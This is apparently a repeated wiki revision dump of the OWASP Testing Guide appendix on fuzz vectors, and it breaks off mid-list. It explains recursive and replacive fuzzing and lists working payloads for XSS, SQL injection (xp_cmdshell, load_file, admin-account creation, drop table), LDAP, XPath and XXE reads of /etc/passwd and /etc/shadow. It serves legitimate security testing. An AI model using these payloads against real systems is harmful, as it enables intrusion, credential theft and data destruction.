&lt;nowiki&gt;//&lt;/nowiki&gt;<br /> &lt;nowiki&gt;//*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*/*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;@*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;count(/child::node())&lt;/nowiki&gt;<br /> &lt;nowiki&gt;x'+or+name()='username'+or+'x'='y&lt;/nowiki&gt;<br /> <br /> === XML Injection ===<br /> <br /> Details on XML Injection here: [[XML_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('gotcha');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foof&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file://c:/boot.ini&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///etc/shadow&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///dev/random&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> <br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Subere https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&diff=14335 OWASP Testing Guide Appendix C: Fuzz Vectors 2006-12-13T23:44:27Z <p>Subere: /* Format String Errors (FSE) */</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> The following are fuzzing vectors which can be used with [[WebScarab]], [[JBroFuzz]], [[WSFuzzer]], or another fuzzer.<br /> Fuzzing is the &quot;kitchen sink&quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.<br /> This is the simple part of the discovery phase.<br /> Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.<br /> <br /> === Fuzz Categories ===<br /> <br /> In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:<br /> <br /> * Recursive fuzzing<br /> * Replacive fuzzing<br /> <br /> We examine and define each category in the sub-sections that follow. <br /> <br /> ==== Recursive fuzzing ====<br /> <br /> Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Selecting &quot;8302fa3b&quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:<br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/00000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/11000fff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/ffffffff&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> ==== Replacive fuzzing ====<br /> <br /> Replacive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: <br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> This is a form of replacive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. <br /> <br /> The remainder of this appendix presents a number of fuzz vector categories.<br /> <br /> === Cross Site Scripting (XSS) ===<br /> <br /> For details on XSS: [[Cross_site_scripting_AoC]]<br /> <br /> &lt;nowiki&gt;&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;STYLE&gt;@import&quot;javascript:alert('XSS')&quot;;&lt;/STYLE&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;<br /> alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&gt;&quot;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=javascript:alert('XSS')&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; &lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;quot;XSS&lt;WBR&gt;&amp;amp;quot;)&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;&lt;WBR&gt;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;&lt;WBR&gt;#116;&amp;amp;#58;&amp;amp;#97;<br /> &amp;amp;#108;&amp;amp;#101;&amp;amp;&lt;WBR&gt;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83&lt;WBR&gt;;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058<br /> &amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;&lt;/nowiki&gt;&lt;br&gt; <br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28<br /> &amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> <br /> === Buffer Overflows and Format String Errors ===<br /> <br /> ==== Buffer Overflows (BFO) ====<br /> A buffer overflow or memory corruption attack is a programming condition which allows overflowing of valid data beyond its prelocated storage limit in memory.<br /> <br /> For details on Buffer Overflows: [[Buffer_Overflow_Testing_AoC]]<br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;A x 5&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 17&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 33&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 65&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 129&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 257&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 513&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 1024&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 2049&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 4097&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 8193&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 12288&lt;/nowiki&gt;<br /> <br /> ==== Format String Errors (FSE) ====<br /> <br /> Format string attacks are a class of vulnerabilities which involve supplying language specific format tokens in order to execute arbitrary code or crash a program. Fuzzing for such errors has as an objective to check for unfiltered user input.<br /> <br /> <br /> &lt;nowiki&gt;%s%p%x%d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;.1024d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%.2049d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%p%p%p%p&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%x%x%x%x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%d%d%d%d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s%s%s%s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%99999999999s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%08x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20n&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s%s%s%s%s%s%s%s%s%s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%p%p%p%p%p%p%p%p%p%p&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s x 129&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%x x 257&lt;/nowiki&gt;<br /> <br /> ==== Integer Overflows (INT) ====<br /> <br /> &lt;nowiki&gt;-1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x100&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x1000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x3fffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x7ffffffe&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x7fffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x80000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0xfffffffe&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0xffffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x10000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x100000&lt;/nowiki&gt;<br /> <br /> === SQL Injection ===<br /> <br /> For details on Testing SQL Injection: [[Testing_for_SQL_Injection]]<br /> <br /> ==== Passive SQL Injection (SQP) ====<br /> <br /> &lt;nowiki&gt;'||(elt(-3+5,bin(15),ord(10),hex(char(45))))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;||6&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'||'6&lt;/nowiki&gt;<br /> &lt;nowiki&gt;(||6)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 1=1--&lt;/nowiki&gt; <br /> &lt;nowiki&gt;OR 1=1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR '1'='1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;; OR '1'='1'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+--+&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot; or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1=1 /*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 'a'='a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot; or &quot;a&quot;=&quot;a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;') or ('a'='a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;Admin' OR '&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' group by userid having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1 in (select @@version)--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union all select @@version--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'unusual' = 'unusual'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'something' = 'some'+'thing'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'text' = N'text'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'something' like 'some%'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 2 &gt; 1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'text' &gt; 't'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'whatever' in ('whatever')&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 2 BETWEEN 1 and 3&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or username like char(37);&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select * from users where login = char(114,111,111,116);&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select &lt;/nowiki&gt;<br /> &lt;nowiki&gt;Password:*/=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;UNI/**/ON SEL/**/ECT&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'/**/OR/**/1/**/=/**/1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1/*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+--+&amp;password=&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; <br /> @var select @var as var into temp end --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1 in (select var from temp)--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select 1,load_file('/etc/passwd'),1,1,1;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;/nowiki&gt;<br /> <br /> ==== Active SQL Injection (SQI) ====<br /> <br /> &lt;nowiki&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &lt;/nowiki&gt;<br /> &lt;nowiki&gt;' ; drop table temp --&lt;/nowiki&gt;<br /> &lt;nowiki&gt;exec sp_addlogin 'name' , 'password'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) <br /> + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&lt;/nowiki&gt;<br /> <br /> === LDAP Injection ===<br /> <br /> For details on LDAP Injection: [[LDAP_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;|&lt;/nowiki&gt;<br /> &lt;nowiki&gt;!&lt;/nowiki&gt;<br /> &lt;nowiki&gt;(&lt;/nowiki&gt;<br /> &lt;nowiki&gt;)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%28&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%26&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%21&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%7C&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*|&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%7C&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*(|(mail=*))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%28%7C%28mail%3D%2A%29%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*(|(objectclass=*))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%28%7C%28objectclass%3D%2A%29%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*()|%26'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;admin*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;admin*)((|userPassword=*)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*)(uid=*))(|(uid=*&lt;/nowiki&gt;<br /> <br /> === XPATH Injection ===<br /> <br /> For details on XPATH Injection: [[XPath_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;'+or+'1'='1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'+or+''='&lt;/nowiki&gt;<br /> &lt;nowiki&gt;x'+or+1=1+or+'x'='y&lt;/nowiki&gt;<br /> &lt;nowiki&gt;/&lt;/nowiki&gt;<br /> &lt;nowiki&gt;//&lt;/nowiki&gt;<br /> &lt;nowiki&gt;//*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*/*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;@*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;count(/child::node())&lt;/nowiki&gt;<br /> &lt;nowiki&gt;x'+or+name()='username'+or+'x'='y&lt;/nowiki&gt;<br /> <br /> === XML Injection ===<br /> <br /> Details on XML Injection here: [[XML_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('gotcha');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foof&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file://c:/boot.ini&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///etc/shadow&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///dev/random&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> <br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Subere https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&diff=14334 OWASP Testing Guide Appendix C: Fuzz Vectors 2006-12-13T23:37:30Z <p>Subere: /* Buffer Overflows (BFO) */</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> The following are fuzzing vectors which can be used with [[WebScarab]], [[JBroFuzz]], [[WSFuzzer]], or another fuzzer.<br /> Fuzzing is the &quot;kitchen sink&quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.<br /> This is the simple part of the discovery phase.<br /> Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.<br /> <br /> === Fuzz Categories ===<br /> <br /> In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:<br /> <br /> * Recursive fuzzing<br /> * Replacive fuzzing<br /> <br /> We examine and define each category in the sub-sections that follow. <br /> <br /> ==== Recursive fuzzing ====<br /> <br /> Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Selecting &quot;8302fa3b&quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:<br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/00000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/11000fff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/ffffffff&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> ==== Replacive fuzzing ====<br /> <br /> Replacive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: <br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> This is a form of replacive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. <br /> <br /> The remainder of this appendix presents a number of fuzz vector categories.<br /> <br /> === Cross Site Scripting (XSS) ===<br /> <br /> For details on XSS: [[Cross_site_scripting_AoC]]<br /> <br /> &lt;nowiki&gt;&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;STYLE&gt;@import&quot;javascript:alert('XSS')&quot;;&lt;/STYLE&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;<br /> alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&gt;&quot;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=javascript:alert('XSS')&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; &lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;quot;XSS&lt;WBR&gt;&amp;amp;quot;)&gt;&lt;/nowiki&gt;<br /> 